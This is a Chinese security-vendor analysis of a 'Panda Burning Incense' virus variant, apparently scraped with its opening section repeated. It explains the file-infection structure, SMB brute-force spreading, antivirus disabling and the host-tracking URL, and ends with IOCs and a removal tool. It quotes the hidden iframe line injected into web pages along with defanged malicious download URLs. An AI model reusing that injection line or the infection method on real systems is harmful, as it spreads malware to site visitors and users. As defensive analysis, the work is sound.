事件描述
一、病毒概述
近日,深信服安全团队收到客户反馈,其内网多台主机中的文件感染了病毒,影响正常业务。经分析,该病毒为“熊猫烧香”病毒变种,虽然该病毒已有十余年历史,但由于其具有很强的感染及传播性,依然很容易在缺少防护的企业内网中传播开来。
病毒会对主机中的可执行文件、压缩文件以及网页文件进行感染,并可通过磁盘、局域网进行传播,同时具有对抗杀软的行为。
最早的“熊猫烧香”病毒中毒后被感染的可执行文件都会变成“熊猫烧香”的图标,这也是该病毒名称的来源。本次捕获的变种由于其在感染可执行文件时会提取原文件的图标并插入到被感染文件中,所以感染后图标不会变。
病毒主要行为如下:
事件描述
一、病毒概述
近日,深信服安全团队收到客户反馈,其内网多台主机中的文件感染了病毒,影响正常业务。经分析,该病毒为“熊猫烧香”病毒变种,虽然该病毒已有十余年历史,但由于其具有很强的感染及传播性,依然很容易在缺少防护的企业内网中传播开来。
病毒会对主机中的可执行文件、压缩文件以及网页文件进行感染,并可通过磁盘、局域网进行传播,同时具有对抗杀软的行为。
最早的“熊猫烧香”病毒中毒后被感染的可执行文件都会变成“熊猫烧香”的图标,这也是该病毒名称的来源。本次捕获的变种由于其在感染可执行文件时会提取原文件的图标并插入到被感染文件中,所以感染后图标不会变。
病毒主要行为如下:
二、详细分析
2.1 植入部分
病毒运行后首先会将自身复制到%SystemRoot%\System32\drivers\suchost.exe:
病毒程序运行时,会判断其所在目录是否存在Desktop_.ini文件,如果存在的话就将其删除:
排除感染NTDETECT.COM文件,然后通过文件后缀名确认感染目标,感染的文件类型主要分为三类:压缩文件、可执行文件和网页文件:RAR、ZIP、EXE、SCR、PIF、COM、htm、html、asp、php、jsp、aspx:
在感染文件前先获取文件大小,超过某个值就不感染。压缩文件为20M,可执行文件与网页文件为10M:
对于RAR、ZIP后缀的压缩文件,会执行winrar命令将其解压缩到C:\MyRARwork文件夹,感染其中的文件后再压缩回原目录:
对于EXE、SCR、PIF、COM后缀的可执行文件,首先判断其是否包含字符串“BMW!!”,是的话则不执行感染:
提取原文件的图标,将其临时保存到%Temp%目录:
复制病毒文件覆盖被感染文件:
将图标文件除写入病毒文件,使得被感染的文件图标不变,随后删除图标文件:
随后将被感染的原文件添加到病毒文件后面,并在尾部写入标志:
可执行文件被感染后的结构为:
病毒文件(替换了图标)+原文件+0x00+”BMW!!”+原文件名+”.exe”+0x02+原文件大小+0x01
被感染的可执行文件尾部如下:
运行被感染的文件,会将原文件释放出来,命名为“原文件名+.exe”:
在Temp目录下创建bat脚本并运行, 在Temp目录下创建bat脚本并运行,bat脚本用于删除被感染的文件并将释放的“原文件名+.exe”重命名为原文件名,内容如下:
对于htm、html、asp、php、jsp、aspx后缀的网页文件的感染,是将恶意链接”<iframe src="hxxp://www.9z9t.com/htmmm/mm.htm" width=0 height=0></iframe>”\”解密后插入到文件末尾:
[3] 局域网传播
对139、445端口进行暴破传播:
2.3 恶意行为部分
停止或卸载杀毒软件:
访问如下网页获取恶意程序下载链接,下载恶意程序并运行:
添加开机自启动项并禁止显示隐藏文件:
关闭网络共享:
将默认浏览器设置为IE,然后将本机mac作为参数访问链接”hxxp://www.daohang08.com/down/tj/mac.asp?mac=”,用于统计中毒主机信息:
三、IOC
MD5:
AE8E8289B688497A672FE90D8A0AAE3F
URL:
hxxp://www.9z9t.com/htmmm/mm.htm
hxxp://www.9z9t.com/down1.txt
hxxp://www.daohang08.com/down/houmendown.txt
hxxp://www.daohang08.com/down/tj/mac.asp?mac=
解决方案
病毒检测查杀
1、深信服为广大用户免费提供查杀工具,可下载如下工具,进行检测查杀:
64位系统下载链接:
http://edr.sangfor.com.cn/tool/SfabAntiBot_X64.7z
32位系统下载链接:
http://edr.sangfor.com.cn/tool/SfabAntiBot_X86.7z
发表评论